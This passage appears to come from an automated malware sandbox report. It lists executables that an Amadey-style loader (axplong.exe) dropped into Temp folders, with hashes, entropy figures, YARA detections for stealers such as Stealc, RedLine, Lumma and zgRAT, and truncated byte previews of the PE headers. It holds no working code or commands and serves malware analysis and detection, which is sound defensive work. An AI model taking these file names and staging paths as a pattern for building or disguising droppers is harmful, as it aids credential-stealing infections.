Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.f................................. ........@.. ....................... ............`.....................................W...................................\................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........................................................................k...(.Q...GQL..q.....Nqr.\.^v.E....<..@=...)!b.=qQ...B.c.....<.q.i. A.QE,T..~f.X3.....~..$.).(8t.........r.c@...i.2.?.-.8..-.....:...'I.`D...?/3?...WP.'...XLz....b.\| 2....*...\........B....Hg$3p.\|+s..K....Z.m.`....w..w.i.Vt..n.LL...d.`a.O..T.......#k.0D@d..8p.{.?Z..-..\W...,.(..P..&`L..?Z..J,y.:...9rY..........D;S.;..3..{..c...,Q........+bN.U.../E..O[....[..W...=..r..x.'...q.S".y.

C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000065001\stories.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3247089
Entropy (8bit):	7.997467756643833
Encrypted:	true
SSDEEP:	98304:4BdEb3KnpRRXOtQI06JQwo2L+qwzbFpmyR9TbxZmC95E6TWPAvD:gnpRADx7wYGBVdiWD
MD5:	BB4417D907E43503F714273F1AE9CF44
SHA1:	973FF5333F859FCF8FD7281509A9BD19D155D82C
SHA-256:	A1A117E8110FACA90E94F5EDD93E0AD4A5D7F49485E30BFA332DB573464C7908
SHA-512:	AB80A72C2E805052084FFC360D9189DB4F5F5797C36ADE71D09A951843455D936FCFF18E85819B48DBA82332F142B34C26320F8D1CE8DF08874829B276BC3018
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.395265378509869
Encrypted:	false
SSDEEP:	3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
MD5:	7A02AA17200AEAC25A375F290A4B4C95
SHA1:	7CC94CA64268A9A9451FB6B682BE42374AFC22FD
SHA-256:	836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
SHA-512:	F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4278784
Entropy (8bit):	7.1283818624071476
Encrypted:	false
SSDEEP:	98304:if7X0ZueTTPs6deIF+iHtcbBt2VSFjUCaZ:8bPeVdeIMiHmbeVS
MD5:	7FA5C660D124162C405984D14042506F
SHA1:	69F0DFF06FF1911B97A2A0AA4CA9046B722C6B2F
SHA-256:	FD3EDFAFF77DD969E3E0D086495E4C742D00E111DF9F935ED61DFBA8392584B2
SHA-512:	D50848ADBFE75F509414ACC97096DAD191AE4CEF54752BDDDCB227FFC0F59BFD2770561E7B3C2A14F4A1423215F05847206AD5C242C7FD5B0655EDF513B22F6C
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................8.....L.............@...........................A..................@..............................x"... ....7..................`..@............................P......................................................CODE................................ ..`DATA.... -..........................@...BSS......................................idata..x".......$..................@....tls.........@...........................rdata.......P......................@..P.reloc..@....`......................@..P.rsrc.....7.. ....7.................@..P..............A......JA.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000254001\penis.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	419328
Entropy (8bit):	6.1177703153619465
Encrypted:	false
SSDEEP:	6144:hVPD7/k5hjsld/TWx3EY9lwXtaW1G4kM0u0b2KrqBDW:hVPHXM31SC4kVu0rGB6
MD5:	A21700718C70EC5E787AD373CB72A757
SHA1:	027554AB5FF3245E7617F3B83D6548BF7919F92E
SHA-256:	87E639ECC7704CB5E29F1EBB1D8ADE3AE863AAA2505A37B28F2D45121DA500C6
SHA-512:	EA292A5442D9FE536E650A2BC5142DD3AEF79C66930243897E0E87C57915F0A54E45E03E58DAFFB473F85FE10B963D4670050BFF5AB3F91121D21D463E25659B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: ditekSHen
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..J...........h... ........@.. ....................................@.................................`h..K.................................................................................... ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............d..............@..B.................h......H........[..................................................................(....(.....0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~2...(.....%..G~2...(.....%..H~2...(.....%..e~2...(.....~3...(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~2...(....o........9......I~2...(.......8C........~2...(....o....:......{....~4...(....8......{....~5...(.........(...........9........o.....

C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	321536
Entropy (8bit):	7.984064781404801
Encrypted:	false
SSDEEP:	6144:/6ZNaeEuexVOkKu/A9UZMOqMVr57KLMLPQ5uRXg6hUm8:/BvOkHPEUsYLeIXgDm8
MD5:	FF5AFED0A8B802D74AF1C1422C720446
SHA1:	7135ACFA641A873CB0C4C37AFC49266BFEEC91D8
SHA-256:	17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
SHA-512:	11724D26E11B3146E0FC947C06C59C004C015DE0AFEA24EC28A4EB8145FCD51E9B70007E17621C83F406D9AEB7CD96601245671D41C3FCC88A27C33BD7CF55AC
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f................................. ........@.. .......................@............`.....................................W............................ ......\|................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H..........................................................................h7....c73..w..V)J.:..a.W'.=.\|...Q&.....p....IIoO...g...Q...P.~CM...v@.P..Sl....a=..:u?ED."..Jp....2..r.B..H...?.v..0]2.....>..F.}.s6..N...h.#.....Z.6..g^gu.aW&.2.n?.v...S...}.!.^..E.h.dp.....fc4{../O..I....v.Q,U...>xK..c.D.../..E7...T...t......y...f..SC....).F.m."2...Ms.3"KL.e..zc.Bb.-.l.\......TYQ..B!.......?.......e]4...../(5......5...4.......'.[.g$.....gb;e..Q..r.Ge(a<..qC.J

C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	360448
Entropy (8bit):	6.667690093536603
Encrypted:	false
SSDEEP:	6144:yEIbJdhhk012D9kEsrwRdvwoShfvM4MH0RoeAcGho33vXvIKgI5TdFaA51TIrxLD:yEIbJvhk0azddWtyA51C09ssEN8mhGfp
MD5:	2F1D09F64218FFFE7243A8B44345B27E
SHA1:	72553E1B3A759C17F54E7B568F39B3F8F1B1CDBE
SHA-256:	4A553C39728410EB0EBD5E530FC47EF1BDF4B11848A69889E8301974FC26CDE2
SHA-512:	5871E2925CA8375F3C3CE368C05EB67796E1FBEC80649D3CC9C39B57EE33F46476D38D3EA8335E2F5518C79F27411A568209F9F6EF38A56650C7436BBAA3F909
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...<..f..........................................@..........................@............@.....................................x................................H...................................................................................text.............................. ..`.rdata...).......*..................@..@.data...X........^..................@....reloc...H.......J...6..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082545442352462
Encrypted:	false
SSDEEP:	3072:Eq6EgY6iArUjOvWUJwPYT8QADFKoRJTA+tJSiK1cZqf7D34leqiOLibBOT:vqY6iULwP/xnRJTAKJ81cZqf7DIvL
MD5:	58E8B2EB19704C5A59350D4FF92E5AB6
SHA1:	171FC96DDA05E7D275EC42840746258217D9CAF0
SHA-256:	07D4B7768E13D79AC5F05F81167B29BB6FBF97828A289D8D11EEC38939846834
SHA-512:	E7655762C5F2D10EC246D11F82D437A2717AD05BE847B5E0FD055E3241CAACA85430F424055B343E3A44C90D76A0BA07A6913C2208F374F59B61F8AA4477889F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	986112
Entropy (8bit):	7.987134427472388
Encrypted:	false
SSDEEP:	24576:6MGVJ/Oap+Bh45LEwaV1QghDHm5GQTSmGg:6NJ/jpi5waVhjm5GQ2m7
MD5:	1EF39C8BC5799AA381FE093A1F2D532A
SHA1:	57EABB02A7C43C9682988227DD470734CC75EDB2
SHA-256:	0CCED5B50789FCA3AD4B2C151B798363D712DA04C377BD704DCEF4898E66B2B4
SHA-512:	13A9C267C4CEB2BD176F1339FAA035FFEB08936DEEEB4E38252EA43CFE487EA1C1876E4CC2A965548E767AF02805A1DA62885E6538DA056BE0C6FAE33B637682
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'1.f.............................!... ...@....@.. ....................................`.................................(!..W....@..`....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................d!......H.......P....G...........U.............................................."..(.......>..(.....oV...&.s..........0..........(.........(....o....3.(....-..j~....%..(....~....o.......j@8...(......s.......o........&..o ...s!.........o".....,...i-....,...o#....($.....o%...o&...o#........(....(......(..........c.o'.......o'........c.o'.......c.o'.......o'........c.o'........c.o'........c.o'....o(......j....+)....o)...nX.....bX.....da.....o*......X......3....bX.....da.....bX....!.

C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	367616
Entropy (8bit):	7.989212623944353
Encrypted:	false
SSDEEP:	6144:A9qV5P6oqa2R9xVnirCMSaMp1iXh7Dvnj+c60jNyRBEKjbXIEloBTOZu:AOB2Rx8/4p1ix/njn9knbvlo
MD5:	6B470F7251AA9C14D7DAEA8F6446E217
SHA1:	A256C54D4DD7E0A7A1582D8FDFEF5807BC3C4AF4
SHA-256:	8B9097B795D42C49C3B2C560714226361671A3F1D711FAA9AEAEE20E22E7095F
SHA-512:	FDC553C9D2FF19343DD99B0B34C875752DF4FA0CBD494096AEB51D859BD102448F1A5043A53A808045AE52077F180546A134B1AA69DB4DC04AFF2610FADEACA4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. ....................................`....................................S.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H......................................................................_..d...K...Sk..+G....Q............J.nj.I.k..)..E&E.8_.b...$..........(#?o8.....b.9....~V.4..v1.uT.0....^...Lb........;...5.H..^.1.\|<..`y54...f.~..Y,.S,..Wp.S[6....Nk.E..^...i&........?on....~!.6A...A....J..n..x.T.H.a......z...c.W...n.g#u.>.A...6K.qcR.9.L..;.z.s<...j.\|.......I:.w..H$...z.]MH..ChD.y.>.o..l.....MA]~......o\Z.1.D.#Khy..Ov.EMA9Y...A.e.8..E...2..&_.......V.H.I...D#.......#M.Lq

C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.946055880339516
Encrypted:	false
SSDEEP:	49152:qFCMAksd1M9uacULmOrLwlNwgbHsx3gLE72rlqJr:9Xd1QutGmE+NZHS32rl
MD5:	904925A03F5E62B7B67EE30D22E9C7CF
SHA1:	ACEC73D1E47B2DDDF74ADDC3529345254135062F
SHA-256:	D5F6C82D696B68C10F33762A2FD0628AFD233B0D07C99654B186F699446D990B
SHA-512:	688660F97C278E2FAD8167AF3C75CCF41E432D7962F0EA242B01D410026541FB140F723A1A42622515C987B692E207C79EB83493CCE7BA73F189CF83E2A4FEA3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L.../..f......................$......`i...........@...........................i.....v.....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..)...%......:..............@...niikbxzg......O..~...<..............@...nnynhmhk.....Pi.....................@....taggant.0...`i.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1929728
Entropy (8bit):	7.951250240981363
Encrypted:	false
SSDEEP:	49152:8lRNijSZ6fzUmuGLLv7CUBhp2skHe4LpFC/:8bNo7UJGLoHJj
MD5:	E0828E289DFBD343733236C6CFCEE121
SHA1:	D55235AAE5323348069AD77A8EDCD77D5E45D2A7
SHA-256:	C1C76C99FF4C06D6B9E252D52B397A0FA281E1AA1A51555193324DECFC0CBCA8
SHA-512:	CC1940ED569D48AB671E16B05CD2A34E03485220A25ABDD3F8E4D615717A6EE4465368B929BA18563CDB051A39DF803CEBD545FFAA8B07B6E07FDBF42E1849C4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................L......`....@.................................W...k.............................L.............................@.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...ewzoukzh.`...02..X..................@...eahzsgud......L......L..............@....taggant.0....L.."...P..............@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000356001\neon.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3643904
Entropy (8bit):	6.674553235078717
Encrypted:	false
SSDEEP:	49152:KXSBgOQSMWnpCkICTugfaU6vTN4Z6WSk7s7jsjS4znnqyIn7TrvU:KygOQSVpC/CHMTWk8zn
MD5:	B3FD0E1003B1CD38402B6D32829F6135
SHA1:	C9CEDD6322FB83457F56B64B4624B07E2786F702
SHA-256:	E4A36BE98F730D706D2CA97A5D687329A1CC7D4848DAF698B7E21B6B9B577F31
SHA-512:	04692E0F80A75F78B533677CEFE3DB6607108ABF19963D88E231925CFA13F1EC054811AEBE53C82D238E732A999CD8D176107D50CF2EA5694D4177CBFD3B30F1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........................\#..<........... ....@...... ........................7...........`...@......@............... ................................#..:........................................................................................... ..H............text....[#.. ...\#................. ..`.rsrc....:....#..<...^#.............@..@........................................H.......X.".T.......N........-"..........................................~....Pt.f..L^[1.w.u......BZ.F...!....-.(...E..!l.\|.I..I.........f.9....H....OO._9XB....CR.....n\|kh.^..rl.y...~....`..Z...B...(.e._.p......F..j.gZ4p...h....Hy.7P6.Q..)9.2y.:...n.Fb.zW...\..cl....]...1.w...-...(....6i(.. ......U.r...g@..N..=q....].'...d....... ...plW!r._....D.x.q_.-.....<.F.sQ#ix.L....+..,b.."..W.......6h...\...d....0...`\.>.....1wlRln(}*...h...c......}:...a....b..9I.,.......P..szo.\|j

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1973760
Entropy (8bit):	7.9495630479940464
Encrypted:	false
SSDEEP:	49152:GJd564fdAN+fobpaJztfWOoh1jpt1zeO67:khgfb8tt/oNtcOI
MD5:	49A9681922AD571A4A24B42465E5CDC4
SHA1:	F710153121BCDE5E6ACD4760001D916675973475
SHA-256:	C66B9636DF8B16D69170B47F28611D70194925CD941C0A7ED49A6F35A599DAD6
SHA-512:	ADCB2E990A433E69468C21BC2F0089D147AAD354BB3D637F280383F5D31913F4AD80A8C121A565A89B36946DF0DF02B142955681E257DD4BCA66470146B976F3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`N...........@...........................N.....2.....@.................................W...k............................AN..............................AN..................................................... . ............................@....rsrc...............................@....idata ............................@... ..,.........................@...ukgzfzxu.....@3.....................@...svxbhzsv.....PN.....................@....taggant.0...`N.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\Tmp21C7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp21D7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp3213.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp3223.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
